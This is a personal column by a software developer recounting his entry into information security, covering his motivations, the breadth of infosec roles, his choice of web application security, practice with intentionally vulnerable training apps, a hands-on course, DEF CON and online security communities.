Hacking is awesome! I can understand the appeal of those that are doing it for a living. The hunt for bugs and the fight to secure systems from bad guys sounds like an incredible challenge of both intellect and skill. It’s probably why I’ve been drawn into the world of cybersecurity. It’s an exciting field to be in for a professional or a hobbyist and one that I’m keen to explore more.
This is the first of many articles that will document my journey from my roots as a coder and a career as a developer advocate at Microsoft to the very personal exploration into the world of information security. The intention is to not only make sense of the overwhelming scope of the field and its varying disciplines but also offer brutally honest assessments of myself and the industry that I so much want to be a part of. Here goes everything!
When I started programming professionally (think MS-DOS), there was no World Wide Web to speak of. Things were fairly siloed, and computer networks were mainly found in large corporate environments. At least for me, worrying about an external threat actor wasn’t really a concern, because there wasn’t a lot to download and my machine wasn’t open to the world. My how things have changed. Billions of devices are now interconnected leveraging the Internet as a data transport mechanism with many of those same devices having some pretty shoddy security.
This connectivity is a blessing and a curse offering this amazing plethora of information from all aspects of life, culture and interests, while at the same time opening an avenue for the mischievous to the criminal to cause problems. As we’ve seen, this could be as trivial as hijacking a Twitter account to embarrass someone to taking out critical infrastructure in politically motivated attacks.
The impetus for my desire to dive deeper into information security was driven by WannaCry, the ransomware campaign that wreaked havoc worldwide. While I had of course read about previous ransomware attacks, this impacted me differently, because human lives were at risk. Hospital computers were locked out and patients, some needing urgent medical attention, were being turned away from the care they needed. This really upset me. What if it were my family affected? What if my child couldn’t get the treatment he or she desperately needed simply because some miscreant wanted to score 300 dollars in Bitcoin? Being a software developer for so many years who also had a background in networking, I felt I had the skills to better understand the security landscape and work towards helping to protect people.
Finding Your Way Around
In modern development, the single constant all programmers understand is that things are going to change all the time. The days of learning a single tool or language and running with that for a decade or two are long gone. The security industry is no different, and, in many respects, more complex due of the scope of assets that need to be protected. When I first started wading into the waters, it became immediately apparent that that there’s no way someone could be an expert in everything. “Information security” is a very large umbrella that encompasses numerous areas like infrastructure, support, incident response, risk, compliance, policy and many others including what many call ethical hacking. Even the hacking area of infosec is very wide and continues to expand. It’s easy to look at Elliot on Mr. Robot and think, “Oh he knows everything about hacking, so I should be him!” The reality is that most security professionals tend to focus on specific areas, becoming subject matter experts that assist teammates at specific times in their engagements. Focus areas might include:
- Web application penetration testing
- Network penetration testing
- Open-source Intelligence (OSINT)
- Digital Forensics & Incident Response (DFIR)
- Reverse engineering (RE)
- Malware research
- Physical penetration testing
This is only a small subset of the countless roles available, but a common theme is that most people are experts in some of these but not all of these. This also means that opportunities abound for anyone wanting to get into this field, because you can choose a subject area, become really good at it and be successful.
That sounds great! So what’s the issue? All of these areas sound so darn cool to work in! I could certainly imagine how much fun it would be to do a physical pentest of a facility, working to get in undetected and poking around. Or how about developing the OSINT skills that would allow you to find information about anyone or anything using a variety of openly available resources? That’s a pretty powerful skill to have nowadays. This is the conundrum that I think many people encounter when they begin their journey into cybersecurity. Which path do I take?!
Choosing a Path – AppSec
As I spoke to experienced security pros, the common direction I kept getting pointed to was application security (AppSec), specifically web AppSec due my expertise in web development. The advice made a lot of sense given my understanding of how modern web apps work and having a good understanding of the infrastructure that powers websites.
In modern web development, there’s a strong reliance on frameworks and libraries not only to help scaffold up applications but also to provide the security safeguards that protect applications. To an extent, having these protections built into a framework is a good thing, but it seems to also breed complacency in understanding what common security issues need to be addressed. And this is evident in the fact that the Open Web Application Security Project (OWASP) recently updated Top 10 security issues list continues to mention SQL injection attacks as #1 on their list. Attackers are continuously being creative, so relying solely on built-in mechanisms to protect applications will continue to be a pain point.
Developers need to have a better understanding of potential threats and the ability to work with a “security first” mindset. Unfortunately, this is many times at odds with the business demands of a site, especially in the startup world where a “ship fast, break things” mentality is pervasive and essential to being a first mover in a specific business segment. It’s not that developers don’t want to build secure apps but more that they have intense pressure to get the code up.
Another major concern is the reliance on third-party OSS code, which is easily included via sources like NPM, can make it challenging to properly vet what is being shipped. It’s well-known that many developers simply do an “npm install <package>” without actually looking at what’s being installed, simply because the package seems to solve some unique use case. This could lead to supply-chain attacks down the line that not only affect the developer but also their end users. This is why companies such as Snyk, VeraCode, Black Duck Software and Whitehat Security are doing well with their code analysis suites and why npm acquired Lift Security to help better protect developers from malicious packages.
That was a long-winded way of saying that AppSec is really important and a path that feels natural for me. There’s a lot of work to be done to educate developers on common security attack vectors, and it’s something I feel I can contribute to. OWASP is one of the best resources for learning about the threats and mitigations offering articles, reference material books, and tools to shore your skills up. One of the best tools I’ve found from the OWASP project is the Juice Shop project. Created and managed by Björn Kimminich, Juice Shop is a purposely vulnerable web application that you can run in a virtual machine and probe to find common vulnerabilities. It’s built on Node.js, the Express framework and AngularJS offering a modern web app architecture to practice both attacks and mitigation techniques. It’s one of my favorite projects, because it forces me to dive deeper into things like network requests, HTTP headers and API calls to break the app and score points using tools like the included browser developer tools as well as proxies like Burp Suite. There are plenty of other prepackaged vulnerable web apps (Damn Vulnerable Web Application (DVWA)) and repositories (Hack.me), but, being my first, Juice Shop deserves special recognition.
It’s not to say that I don’t like other aspects of security. I REALLY love the thought of pentesting a network or gathering threat intel. AppSec is just the area that offers the lowest barrier to entry, and I see it as an on-ramp to other areas.
The Glut of Information
The wealth of learning resources on the Internet is a double-edged sword. It’s absolutely amazing that you can find a ton of articles, videos, courses and projects all relating to security. The downside is figuring out how to organize all of that information into a concise flow that allows you to ramp up in a thoughtful and methodical way, so you’re not overwhelmed. This is what happened to me initially. I became so excited about learning about security, that I started buying books and courses, looking at videos, bookmarking articles and downloading tools like Kali… all without a plan or understanding what to do with them. It just seemed like that’s what I needed to do, and I remember time passing by with me scratching my head wondering, “how do I make all of these tools work in a logical way?”. I went as far as building a “p0wn phone” using Kali Nethunter, because it looked cool and was a nice project. Was I able to get it installed and running? Yep. Was I able to do anything useful with it? Nope. While I enjoyed the challenge of getting this phone setup, it would’ve been a much more beneficial experience if I actually knew how to use the tools on the phone.
My “Ah ha!” moment came when I took an on-site, 4-day hands-on course with Matthew Hickey (@hackerfantastic), co-founder of Hacker House. It was an introduction to hacking using many of the tools included in Kali along with others provided by Matthew directly. The key thing is that it allowed me to get guidance on when to use a tool and why something worked the way it did. It also allowed me to ask questions that helped me grok why something wasn’t working the way I expected. The course gave me the foundation I needed to understand how to make use of these tools, something that I struggled with from the vast sea of generally disorganized information available online. This gave me the confidence to attack VMs like Juice Shop and see actual results.
Some people learn from books, some learn from pulling information together from a variety of resources. For me, getting a good foundation with a mentor was critical to developing an understanding of how to move forward in this complex field. Since the course, I’ve seen a slew of online offerings that are catering to people looking for a well-defined path and offering an organized learning curriculum. Companies like eLearnSecurity and SANS have developed these types of course offerings working to help students become proficient in a structured fashion.
The biggest takeaway I’ve gotten is that security is a BIG topic area, and it will take time to learn even on subject area. My recommendation is to:
- Don’t buy anything or install anything without doing your homework first
- Find a specific area and focus on understanding what a job entails
- Understand what the bare minimum requirements to entry are
- Seek a mentor who can guide you towards resources that are specifically tailored towards your interest area
- If possible, take a course that will allow you to interact with an instructor and fellow students
It’s really easy to be overwhelmed by the glut of information. If you visit YouTube and search for hacking tutorials, it’s a never-ending medium of information that may not resonate, because you don’t have the foundational skills to grok it. Take your time and investigate which area really piques your interest and then follow my advice above.
Chat Servers, Forums and Conferences
Humans generally have an innate desire to discuss their new interests. It’s the gravitational pull to find like-minded people that you can share and hang out with, because they “get” what you’re into. It’s like the joke about CrossFitters. How do you know someone does CrossFit? They never stop talking about CrossFit (note I do CrossFit)! So, it’s normal to seek out online mediums and in-person events to participate in.
For me, DEF CON was that in-person event. This was the tweet I put out about it:
I would love to go to @defcon but I’m scare shitless to go to Def Con
— Rey Bango (@reybango) March 10, 2017
And yes I was very intimidated by DEF CON, because the thought of being at an event with 13,000 hackers of different color hats left me a bit uneasy. And I don’t feel it was unfounded. DEF CON is known for having one of the most hostile networks around, and, if you go in there unprepared, you’ll get owned. Thankfully, a LOT of the community came out to support me giving me tips for having a great experience. People like Matt Torbin spent time showing me the ins and outs of what to do and how not to get in trouble. It was truly amazing and eye-opening. While you certainly wanted to be on your toes, what I discovered was the majority of attendees were really kind, open, and generous with a lot of effort going into providing an inclusive experience. What I ultimately came to find out is that events like DEF CON are as much about building new relationships as they are about the talks. So when you go to an event, it’s really important to meet people and make new friends. It truly makes events go way better, because being alone for several days at a conference truly sucks.
As for chat servers and forums, the first bit of advice I want to offer is to be careful. There are a lot of different servers out there and not all have good intentions, so it’s very important to properly manage the information you share out. I was fortunate to meet some folks early on who were really savvy in operational security (OPSEC) and helped me understand things like:
- Creating online personas
- Asking questions in ways that don’t directly identify you
- Using tools like VPNs to better anonymize myself
This allowed me to engage at a pace that was comfortable for me without getting myself into trouble. With that said, some of the brightest people I’ve met have been via Slack and Discord servers like:
The main thing to keep in mind is that there will be a lot of general banter and some trolling in these mediums, but, if you can filter out the noise, the signal is definitely worth the effort. Most folk on these mediums are simply there to share ideas and get help in learning about security. Depending on how engaged you are, you can build online relationships that can transfer to the real-world at conferences and meetups. Many of the people I’ve met online I’ve also had the good fortune to meet in person with some even becoming trusted friends. It’s always interesting putting a face to an alias and spending in-person time chatting. It brings a different & humanizing dimension to the relationship.
No matter what, it’s important to keep your wits about you. Not everyone has good intentions so be cautious but do engage.
What’s Next for Me?
That’s a good question. I’ve been seeing a trend in computers for a while where I feel the two biggest career growth areas are Artificial Intelligence/Machine Learning and Information Security. Having a better understanding of the latter now, I absolutely think it’s important for me to continue to learn how to build secure systems, and I see AppSec as the logical north star for me. I have a good relationship with the web and OSS community which I believe can allow me to have good conversations and get a handle on best-practices for web apps. As a developer advocate, I spend a lot of time chatting with developers, so it seems like a great opportunity to bring this topic into my exchanges, whether for a speaking engagement or just “hallwaycon” discussions. Web developers have an important but very challenging role. Building stable and secure applications is hard, and invariably people will make mistakes. If I can help minimize those mistakes, then I feel it’s the right path to take.
The one thing I do know is that I’m hooked on cybersecurity. My friend Justin (@sneakerhax) told me that I have a bad case of “security flu,” and I have to agree. While I’ll be incorporating security into my day job to an extent, I also want to continue evolving this beyond AppSec and learning more aspects of security. It’s been a fun ride so far, and I’ve no plans of getting off just yet.
So, stay tuned to this new column, where I will continue my journey into security. What I find and the experiences I have will determine the path and future topics.
Rey Bango is a developer advocate at Microsoft focused on helping developers build awesome cross-browser experiences. He’s an ardent supporter of standards-based development and open-source development. He’s taken an interest in information security, especially appsec, and wants to help build more secure experiences.bango career ethical hacking programming webapp